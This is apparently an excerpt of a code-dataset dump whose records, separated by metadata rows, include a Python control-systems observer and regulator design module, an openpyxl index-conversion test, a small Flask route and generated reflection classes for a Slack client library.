    # place the poles such that eig(phi - gamma*L) are inside the unit circle
    full_state_feedback = signal.place_poles(phi, gamma, zpoles)
    # Check the poles for stability just in case
    for zpole in full_state_feedback.computed_poles:
        if abs(zpole) >= 1:
            print("Computed pole is not stable")
            return None
    L = full_state_feedback.gain_matrix
    # Choose poles if none were given
    if sopoles is None:
        sopoles = []
        if desired_observer_settling_time is None:
            # Observer converges 4x faster than the regulator by default.
            desired_observer_settling_time = desired_settling_time/4
        # TODO: Find existing poles based on the rules. For now just use bessel
        num_sopoles_left = num_states - len(sopoles)
        if num_sopoles_left > 0:
            # Use normalized bessel poles for the rest
            sopoles.extend(control_poles.bessel_spoles(num_sopoles_left, desired_observer_settling_time))
            if disp:
                print("Using normalized bessel for the remaining", num_sopoles_left, "sopoles")
    zopoles = control_poles.spoles_to_zpoles(sopoles, sampling_interval)
    if disp:
        print("sopoles = ", sopoles)
        print("zopoles = ", zopoles)
    # Find K such that eig(phi - KC) are inside the unit circle.
    # Observer gain placement is the dual problem, so place on transposes.
    full_state_feedback = signal.place_poles(np.transpose(phi), np.transpose(C), zopoles)
    # Check the poles for stability just in case. >= 1 rejects marginally
    # stable poles on the unit circle, matching the regulator check above.
    for zopole in full_state_feedback.computed_poles:
        if abs(zopole) >= 1:
            print("Computed observer pole is not stable")
            return None
    K = np.transpose(full_state_feedback.gain_matrix)
    return (sys_d_ol, np.matrix(L), np.matrix(K))
def design_regredob(sys_c_ol, sampling_interval, desired_settling_time,
                    desired_observer_settling_time=None, spoles=None, sopoles=None,
                    disp=True):
    """ Design a digital reduced order observer regulator with the desired settling time.
    Args:
        sys_c_ol (StateSpace): The continuous plant model
        sampling_interval: The sampling interval for the digital control system in seconds.
        desired_settling_time: The desired settling time in seconds
        desired_observer_settling_time (optional): The desired observer settling time
            in seconds. If not provided the observer settling time will be 4 times faster
            than the overall settling time. Default is None.
        spoles (optional): The desired closed loop poles. If not supplied, then optimal
            poles will try to be used. Default is None.
        sopoles (optional): The desired observer poles. If not supplied, then optimal
            poles will try to be used. Default is None.
        disp: Print debugging output. Default is True.
    Returns:
        tuple: (sys_d_ol, L, K, F, G, H) Where sys_d_ol is the discrete plant, L is
            the stablizing gain matrix, K is the observer gain matrix, and F, G, H
            are the reduced order observer matrices. None is returned on any design
            failure.
    """
    # Make sure the system is in fact continuous and not discrete
    # (continuous StateSpace systems have dt of None).
    if sys_c_ol.dt is not None:
        print("Error: Function expects continuous plant")
        return None
    A = sys_c_ol.A
    B = sys_c_ol.B
    C = sys_c_ol.C
    D = sys_c_ol.D
    num_states = A.shape[0]
    num_inputs = B.shape[1]
    num_outputs = C.shape[0]
    # Only the unmeasured states need to be estimated by the observer.
    num_measured_states = num_outputs
    num_unmeasured_states = num_states - num_measured_states
    # Convert to discrete system using zero order hold method
    sys_d_ol = sys_c_ol.to_discrete(sampling_interval, method="zoh")
    phi = sys_d_ol.A
    gamma = sys_d_ol.B
    # Check controlability of the discrete system
    controllability_mat = control.ctrb(phi, gamma)
    rank = LA.matrix_rank(controllability_mat)
    if rank != num_states:
        print(rank, num_states)
        print("Error: System is not controlable")
        return None
    # Check observability of the discrete system
    observability_mat = control.obsv(phi, C)
    rank = LA.matrix_rank(observability_mat)
    if rank != num_states:
        print("Error: System is not observable")
        return None
    # Choose poles if none were given
    if spoles is None:
        spoles = find_candadate_spoles(sys_c_ol, desired_settling_time, disp)
        num_spoles_left = num_states - len(spoles)
        if num_spoles_left > 0:
            # Use normalized bessel poles for the rest
            spoles.extend(control_poles.bessel_spoles(num_spoles_left, desired_settling_time))
    zpoles = control_poles.spoles_to_zpoles(spoles, sampling_interval)
    if disp:
        print("spoles = ", spoles)
        print("zpoles = ", zpoles)
    # place the poles such that eig(phi - gamma*L) are inside the unit circle
    full_state_feedback = signal.place_poles(phi, gamma, zpoles)
    # Check the poles for stability just in case
    for zpole in full_state_feedback.computed_poles:
        if abs(zpole) >= 1:
            print("Computed pole is not stable")
            return None
    L = full_state_feedback.gain_matrix
    # Choose poles if none were given
    if sopoles is None:
        sopoles = []
        if desired_observer_settling_time is None:
            # Observer converges 4x faster than the regulator by default.
            desired_observer_settling_time = desired_settling_time/4
        # TODO: Find existing poles based on the rules. For now just use bessel
        num_sopoles_left = num_unmeasured_states - len(sopoles)
        if num_sopoles_left > 0:
            # Use normalized bessel poles for the rest
            sopoles.extend(control_poles.bessel_spoles(num_sopoles_left, desired_observer_settling_time))
            if disp:
                print("Using normalized bessel for the remaining", num_sopoles_left, "sopoles")
    zopoles = control_poles.spoles_to_zpoles(sopoles, sampling_interval)
    if disp:
        print("sopoles = ", sopoles)
        print("zopoles = ", zopoles)
    # partition out the phi and gamma matrix into measured/unmeasured parts
    phi11 = phi[:num_measured_states, :num_measured_states]
    phi12 = phi[:num_measured_states, num_measured_states:]
    # BUGFIX: row slice needs the colon; without it phi21 was a single row
    # instead of the (unmeasured x measured) partition.
    phi21 = phi[num_measured_states:, :num_measured_states]
    phi22 = phi[num_measured_states:, num_measured_states:]
    gamma1 = gamma[:num_measured_states]
    gamma2 = gamma[num_measured_states:]
    C1 = C[:num_measured_states, :num_measured_states]
    if num_measured_states >= num_states/2 and LA.matrix_rank(phi12) == num_unmeasured_states:
        # case 1: solve for K directly via a pseudo-inverse of C1*phi12
        if num_unmeasured_states % 2 == 0:
            F = np.matrix([
                [zopoles[0].real, zopoles[0].imag],
                [zopoles[1].imag, zopoles[1].real]
            ])
        else:
            # We only support 1 real pole
            F = np.matrix([zopoles[0].real])
        cp = C1 * phi12
        cp_t = np.transpose(cp)
        K = (phi22 - F)* np.linalg.inv(cp_t * cp) * cp_t
    elif num_measured_states == 1:
        # case 2 (unsupported). BUGFIX: bail out here -- the original fell
        # through with K and F unset (and called the nonexistent np.eig),
        # which crashed further down.
        print ("unsupported design with measured states = 1")
        return None
    else:
        # general case: dual pole placement on the unmeasured partition
        full_state_feedback = signal.place_poles(np.transpose(phi22), np.transpose(C1*phi12), zopoles)
        K = np.transpose(full_state_feedback.gain_matrix)
        F = phi22 - K * C1 * phi12
    H = gamma2 - K * C1 * gamma1
    G = (phi21 - K * C1 * phi11) * np.linalg.inv(C1) + (F * K)
    # Check the observer poles for stability just in case. eig(F) are the
    # observer poles in every branch above (the original rechecked the
    # already-validated state feedback poles when case 1 was taken).
    for zopole in LA.eigvals(F):
        if abs(zopole) >= 1:
            print("Computed observer pole is not stable")
            return None
    return (sys_d_ol, np.matrix(L), np.matrix(K), np.matrix(F), np.matrix(G), np.matrix(H))
def design_tsob(sys_c_ol, Ca, sampling_interval, desired_settling_time,
                desired_observer_settling_time=None, spoles=None, sopoles=None, sapoles=None,
                disp=True):
    """ Design a digital full order observer tracking system with the desired settling time.
    Args:
        sys_c_ol (StateSpace): The continuous plant model
        Ca: The output matrix selecting the tracked outputs.
        sampling_interval: The sampling interval for the digital control system in seconds.
        desired_settling_time: The desired settling time in seconds
        desired_observer_settling_time (optional): The desired observer settling time
            in seconds. If not provided the observer settling time will be 4 times faster
            than the overall settling time. Default is None.
        spoles (optional): The desired closed loop poles. If not supplied, then optimal
            poles will try to be used. Default is None.
        sopoles (optional): The desired observer poles. If not supplied, then optimal
            poles will try to be used. Default is None.
        sapoles (optional): The poles of the reference input and disturbance vectors.
            If not supplied the reference input is assumed to be a step. Default is None.
        disp: Print debugging output. Default is True.
    Returns:
        tuple: (sys_d_ol, phia, gammaa, L1, L2, K) Where sys_d_ol is the discrete plant,
            phia is the discrete additional dynamics A matrix, gammaa is the discrete
            additional dynamics B matrix, L1 is the plant gain matrix, L2 is the
            additional gain matrix, and K is the observer gain matrix. None is
            returned on any design failure.
    """
    if disp:
        print("Designing a tracking system with full order observer.")
    # Make sure the system is in fact continuous and not discrete
    # (continuous StateSpace systems have dt of None).
    if sys_c_ol.dt is not None:
        print("Error: Function expects continuous plant")
        return None
    A = sys_c_ol.A
    B = sys_c_ol.B
    C = sys_c_ol.C
    D = sys_c_ol.D
    num_states = A.shape[0]
    num_inputs = B.shape[1]
    num_outputs = C.shape[0]
    num_tracked = Ca.shape[0]
    # Convert to discrete system using zero order hold method
    sys_d_ol = sys_c_ol.to_discrete(sampling_interval, method="zoh")
    phi = sys_d_ol.A
    gamma = sys_d_ol.B
    # Check controlability of the discrete system
    controllability_mat = control.ctrb(phi, gamma)
    rank = LA.matrix_rank(controllability_mat)
    if rank != num_states:
        print(rank, num_states)
        print("Error: System is not controlable")
        return None
    # Check observability of the discrete system
    observability_mat = control.obsv(phi, C)
    rank = LA.matrix_rank(observability_mat)
    if rank != num_states:
        print("Error: System is not observable")
        return None
    # Create the design model with additional dynamics
    if sapoles is None:
        # assume tracking a step input (s=0, z=1)
        sapoles = [0]
    # The additional dynamics are built in controllable canonical form from
    # the characteristic polynomial of the reference/disturbance poles.
    zapoles = [ -p for p in np.poly(control_poles.spoles_to_zpoles(sapoles, sampling_interval)) ]
    zapoles = np.delete(zapoles, 0) # the first coefficient isn't important
    gammaa = np.transpose(np.matrix(zapoles))
    q = gammaa.shape[0]
    phia_left = np.matrix(gammaa)
    phia_right = np.concatenate((np.eye(q-1), np.zeros((1, q-1))), axis=0)
    phia = np.concatenate((phia_left, phia_right), axis=1)
    if num_tracked > 1:
        # replicate the additional dynamics once per tracked output
        phia = np.kron(np.eye(num_tracked), phia)
        gammaa = np.kron(np.eye(num_tracked), gammaa)
    # Form the design matrix: plant cascaded with the additional dynamics
    phid_top_row = np.concatenate((phi, np.zeros((num_states, q*num_tracked))), axis=1)
    phid_bot_row = np.concatenate((gammaa*Ca, phia), axis=1)
    phid = np.concatenate((phid_top_row, phid_bot_row), axis=0)
    gammad = np.concatenate((gamma, np.zeros((gammaa.shape[0], num_tracked))), axis=0)
    # Choose poles if none were given
    if spoles is None:
        spoles = find_candadate_spoles(sys_c_ol, desired_settling_time, disp)
        num_spoles_left = num_states - len(spoles)
        if num_spoles_left > 0:
            # Use normalized bessel poles for the rest
            spoles.extend(control_poles.bessel_spoles(num_spoles_left, desired_settling_time))
    zpoles = control_poles.spoles_to_zpoles(spoles, sampling_interval)
    if disp:
        print("spoles = ", spoles)
        print("zpoles = ", zpoles)
    # place the poles such that eig(phi - gamma*L) are inside the unit circle
    full_state_feedback = signal.place_poles(phid, gammad, zpoles)
    # Check the poles for stability just in case
    for zpole in full_state_feedback.computed_poles:
        if abs(zpole) >= 1:
            print("Computed pole is not stable", zpole)
            return None
    L = full_state_feedback.gain_matrix
    # Split the design gain into plant and additional-dynamics parts.
    L1 = L[:,0:num_states]
    L2 = L[:,num_states:]
    # Choose poles if none were given
    if sopoles is None:
        sopoles = []
        if desired_observer_settling_time is None:
            # Observer converges 4x faster than the regulator by default.
            desired_observer_settling_time = desired_settling_time/4
        # TODO: Find existing poles based on the rules. For now just use bessel
        num_sopoles_left = num_states - len(sopoles)
        if num_sopoles_left > 0:
            # Use normalized bessel poles for the rest
            sopoles.extend(control_poles.bessel_spoles(num_sopoles_left, desired_observer_settling_time))
    zopoles = control_poles.spoles_to_zpoles(sopoles, sampling_interval)
    if disp:
        print("sopoles = ", sopoles)
        print("zopoles = ", zopoles)
    # Find K such that eig(phi - KC) are inside the unit circle.
    # Observer gain placement is the dual problem, so place on transposes.
    full_state_feedback = signal.place_poles(np.transpose(phi), np.transpose(C), zopoles)
    # Check the poles for stability just in case. >= 1 rejects marginally
    # stable poles on the unit circle, matching the regulator check above.
    for zopole in full_state_feedback.computed_poles:
        if abs(zopole) >= 1:
            print("Computed observer pole is not stable", zopole)
            return None
    K = np.transpose(full_state_feedback.gain_matrix)
    return (sys_d_ol, phia, gammaa, np.matrix(L1), np.matrix(L2), np.matrix(K))
| 39.595238
| 106
| 0.643832
| 2,922
| 21,619
| 4.581451
| 0.092402
| 0.048405
| 0.016135
| 0.036304
| 0.801374
| 0.791514
| 0.78001
| 0.76014
| 0.745873
| 0.737282
| 0
| 0.008135
| 0.283593
| 21,619
| 545
| 107
| 39.66789
| 0.856211
| 0.316712
| 0
| 0.723127
| 0
| 0
| 0.07912
| 0
| 0
| 0
| 0
| 0.005505
| 0
| 1
| 0.016287
| false
| 0
| 0.022801
| 0
| 0.117264
| 0.156352
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
034293ce2a04f11b0dc31d8028d05497414807a9
| 2,234
|
py
|
Python
|
tests/test_08_0_openpyxl.py
|
simkimsia/ug-read-write-excel-using-python
|
ac84ca5aac3a71700e8f63a64c5b9bdd58df5804
|
[
"MIT"
] | 1
|
2018-03-31T07:39:08.000Z
|
2018-03-31T07:39:08.000Z
|
tests/test_08_0_openpyxl.py
|
simkimsia/ug-read-write-excel-using-python
|
ac84ca5aac3a71700e8f63a64c5b9bdd58df5804
|
[
"MIT"
] | 11
|
2018-03-01T07:47:06.000Z
|
2018-03-23T06:29:04.000Z
|
tests/test_08_0_openpyxl.py
|
simkimsia/ug-read-write-excel-using-python
|
ac84ca5aac3a71700e8f63a64c5b9bdd58df5804
|
[
"MIT"
] | 1
|
2018-02-28T15:05:22.000Z
|
2018-02-28T15:05:22.000Z
|
from examples.c08_0_convert_indices_coordinates.openpyxl import index
from base_test_cases import ExcelTest
class TestOpenPyXLIndicesCoordinates(ExcelTest):
    """Exercises the openpyxl-based coordinate/index conversion helpers."""

    def test_coordinates_to_indices(self):
        # (coordinate, zero_based flag, expected (col, row) indices)
        cases = [
            ('A4', True, (0, 3)),
            ('A4', False, (1, 4)),
            ('AB24', True, (27, 23)),
            ('AB24', False, (28, 24)),
        ]
        for coordinate_string, zero_based, expected_indices in cases:
            indices = index.coordinate_to_index(coordinate_string, zero_based)
            self.assertEqual(indices, expected_indices)

    def test_indices_to_coordinates(self):
        # ((col, row) indices, zero_based flag, expected coordinate)
        cases = [
            ((1, 4), False, 'A4'),
            ((1, 4), True, 'B5'),
            ((1, 1), True, 'B2'),
            ((28, 24), False, 'AB24'),
            ((28, 24), True, 'AC25'),
        ]
        for indices, zero_based, expected_coordinate_string in cases:
            coordinate_string = index.index_to_coordinate(indices, zero_based)
            self.assertEqual(coordinate_string, expected_coordinate_string)
| 38.517241
| 74
| 0.713071
| 245
| 2,234
| 6.126531
| 0.159184
| 0.277149
| 0.159893
| 0.143904
| 0.815456
| 0.778148
| 0.702865
| 0.702865
| 0.702865
| 0.702865
| 0
| 0.018933
| 0.219785
| 2,234
| 57
| 75
| 39.192982
| 0.842226
| 0
| 0
| 0.586957
| 0
| 0
| 0.008953
| 0
| 0
| 0
| 0
| 0
| 0.195652
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.108696
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
037388499d8705c139aeb5800119165a1809ae02
| 144
|
py
|
Python
|
app/blueprints/info/routes.py
|
reynoldsjs/Final-Project
|
989afb729fa58e9b98ce14c123c692a08ced5807
|
[
"CC-BY-3.0"
] | null | null | null |
app/blueprints/info/routes.py
|
reynoldsjs/Final-Project
|
989afb729fa58e9b98ce14c123c692a08ced5807
|
[
"CC-BY-3.0"
] | null | null | null |
app/blueprints/info/routes.py
|
reynoldsjs/Final-Project
|
989afb729fa58e9b98ce14c123c692a08ced5807
|
[
"CC-BY-3.0"
] | 1
|
2021-01-29T04:32:25.000Z
|
2021-01-29T04:32:25.000Z
|
from . import bp as info
from flask import render_template
@info.route('/about_us')
def about_us():
return render_template('aboutus.html')
| 20.571429
| 42
| 0.75
| 22
| 144
| 4.727273
| 0.681818
| 0.269231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 144
| 6
| 43
| 24
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
cefe8cbd77cce18bc848eb5f688cc3adbcaf7dc7
| 35,030
|
py
|
Python
|
quarkc/test/ffi/expected/py/slackpack/slackpack_md/__init__.py
|
datawire/quark
|
df0058a148b077c0aff535eb6ee382605c556273
|
[
"Apache-2.0"
] | 112
|
2015-10-02T19:51:51.000Z
|
2022-03-07T06:29:44.000Z
|
quarkc/test/ffi/expected/py/slackpack/slackpack_md/__init__.py
|
datawire/quark
|
df0058a148b077c0aff535eb6ee382605c556273
|
[
"Apache-2.0"
] | 181
|
2015-10-01T20:23:38.000Z
|
2016-12-07T17:21:26.000Z
|
quarkc/test/ffi/expected/py/slackpack/slackpack_md/__init__.py
|
datawire/quark
|
df0058a148b077c0aff535eb6ee382605c556273
|
[
"Apache-2.0"
] | 31
|
2015-10-13T22:10:00.000Z
|
2020-08-03T02:50:12.000Z
|
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from builtins import str as unicode
from quark_runtime import *
_lazyImport.plug("slackpack_md.slack_event_SlackEvent_load_Method")
import quark.reflect
class slack_event_SlackEvent_load_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_SlackEvent_load_Method, self).__init__(u"quark.void", u"load", _List([u"slack.Client", u"quark.JSONObject"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.SlackEvent);
(obj).load(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: _JSONObject));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_SlackEvent_dispatch_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_SlackEvent_dispatch_Method, self).__init__(u"quark.void", u"dispatch", _List([u"slack.SlackHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.SlackEvent);
(obj).dispatch(_cast((args)[0], lambda: slack.SlackHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_SlackEvent(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_SlackEvent, self).__init__(u"slack.event.SlackEvent");
(self).name = u"slack.event.SlackEvent"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.String", u"type"), quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"slack.Channel", u"channel"), quark.reflect.Field(u"quark.String", u"timestamp")])
(self).methods = _List([slack_event_SlackEvent_load_Method(), slack_event_SlackEvent_dispatch_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slack.event.SlackEvent()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_SlackEvent.singleton = slack_event_SlackEvent()
class slack_event_SlackError_load_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_SlackError_load_Method, self).__init__(u"quark.void", u"load", _List([u"slack.Client", u"quark.JSONObject"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.SlackError);
(obj).load(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: _JSONObject));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_SlackError_dispatch_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_SlackError_dispatch_Method, self).__init__(u"quark.void", u"dispatch", _List([u"slack.SlackHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.SlackError);
(obj).dispatch(_cast((args)[0], lambda: slack.SlackHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_SlackError(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_SlackError, self).__init__(u"slack.event.SlackError");
(self).name = u"slack.event.SlackError"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.String", u"type"), quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"slack.Channel", u"channel"), quark.reflect.Field(u"quark.String", u"timestamp"), quark.reflect.Field(u"quark.int", u"code"), quark.reflect.Field(u"quark.String", u"text")])
(self).methods = _List([slack_event_SlackError_load_Method(), slack_event_SlackError_dispatch_Method()])
(self).parents = _List([u"slack.event.SlackEvent"])
def construct(self, args):
return slack.event.SlackError()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_SlackError.singleton = slack_event_SlackError()
class slack_event_Hello_dispatch_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_Hello_dispatch_Method, self).__init__(u"quark.void", u"dispatch", _List([u"slack.SlackHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.Hello);
(obj).dispatch(_cast((args)[0], lambda: slack.SlackHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_Hello_load_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_Hello_load_Method, self).__init__(u"quark.void", u"load", _List([u"slack.Client", u"quark.JSONObject"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.Hello);
(obj).load(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: _JSONObject));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_Hello(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_Hello, self).__init__(u"slack.event.Hello");
(self).name = u"slack.event.Hello"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.String", u"type"), quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"slack.Channel", u"channel"), quark.reflect.Field(u"quark.String", u"timestamp")])
(self).methods = _List([slack_event_Hello_dispatch_Method(), slack_event_Hello_load_Method()])
(self).parents = _List([u"slack.event.SlackEvent"])
def construct(self, args):
return slack.event.Hello()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_Hello.singleton = slack_event_Hello()
class slack_event_Message_load_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_Message_load_Method, self).__init__(u"quark.void", u"load", _List([u"slack.Client", u"quark.JSONObject"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.Message);
(obj).load(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: _JSONObject));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_Message_dispatch_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_Message_dispatch_Method, self).__init__(u"quark.void", u"dispatch", _List([u"slack.SlackHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.Message);
(obj).dispatch(_cast((args)[0], lambda: slack.SlackHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_Message(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_Message, self).__init__(u"slack.event.Message");
(self).name = u"slack.event.Message"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.String", u"type"), quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"slack.Channel", u"channel"), quark.reflect.Field(u"quark.String", u"timestamp"), quark.reflect.Field(u"quark.String", u"subtype"), quark.reflect.Field(u"quark.bool", u"hidden"), quark.reflect.Field(u"quark.String", u"text"), quark.reflect.Field(u"slack.event.Edited", u"edited")])
(self).methods = _List([slack_event_Message_load_Method(), slack_event_Message_dispatch_Method()])
(self).parents = _List([u"slack.event.SlackEvent"])
def construct(self, args):
return slack.event.Message()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_Message.singleton = slack_event_Message()
class slack_event_Edited(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_Edited, self).__init__(u"slack.event.Edited");
(self).name = u"slack.event.Edited"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"quark.String", u"timestamp")])
(self).methods = _List([])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slack.event.Edited()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_Edited.singleton = slack_event_Edited()
class slack_SlackHandler_onSlackEvent_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_SlackHandler_onSlackEvent_Method, self).__init__(u"quark.void", u"onSlackEvent", _List([u"slack.event.SlackEvent"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.SlackHandler);
(obj).onSlackEvent(_cast((args)[0], lambda: slack.event.SlackEvent));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_SlackHandler_onHello_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_SlackHandler_onHello_Method, self).__init__(u"quark.void", u"onHello", _List([u"slack.event.Hello"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.SlackHandler);
(obj).onHello(_cast((args)[0], lambda: slack.event.Hello));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_SlackHandler_onSlackError_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_SlackHandler_onSlackError_Method, self).__init__(u"quark.void", u"onSlackError", _List([u"slack.event.SlackError"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.SlackHandler);
(obj).onSlackError(_cast((args)[0], lambda: slack.event.SlackError));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_SlackHandler_onMessage_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_SlackHandler_onMessage_Method, self).__init__(u"quark.void", u"onMessage", _List([u"slack.event.Message"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.SlackHandler);
(obj).onMessage(_cast((args)[0], lambda: slack.event.Message));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_SlackHandler(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_SlackHandler, self).__init__(u"slack.SlackHandler");
(self).name = u"slack.SlackHandler"
(self).parameters = _List([])
(self).fields = _List([])
(self).methods = _List([slack_SlackHandler_onSlackEvent_Method(), slack_SlackHandler_onHello_Method(), slack_SlackHandler_onSlackError_Method(), slack_SlackHandler_onMessage_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return None
def isAbstract(self):
return True
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_SlackHandler.singleton = slack_SlackHandler()
class slack_User(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_User, self).__init__(u"slack.User");
(self).name = u"slack.User"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"slack.Client", u"client"), quark.reflect.Field(u"quark.String", u"user")])
(self).methods = _List([])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slack.User(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: unicode))
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_User.singleton = slack_User()
class slack_Channel_send_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Channel_send_Method, self).__init__(u"quark.void", u"send", _List([u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Channel);
(obj).send(_cast((args)[0], lambda: unicode));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Channel(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_Channel, self).__init__(u"slack.Channel");
(self).name = u"slack.Channel"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"slack.Client", u"client"), quark.reflect.Field(u"quark.String", u"channel")])
(self).methods = _List([slack_Channel_send_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
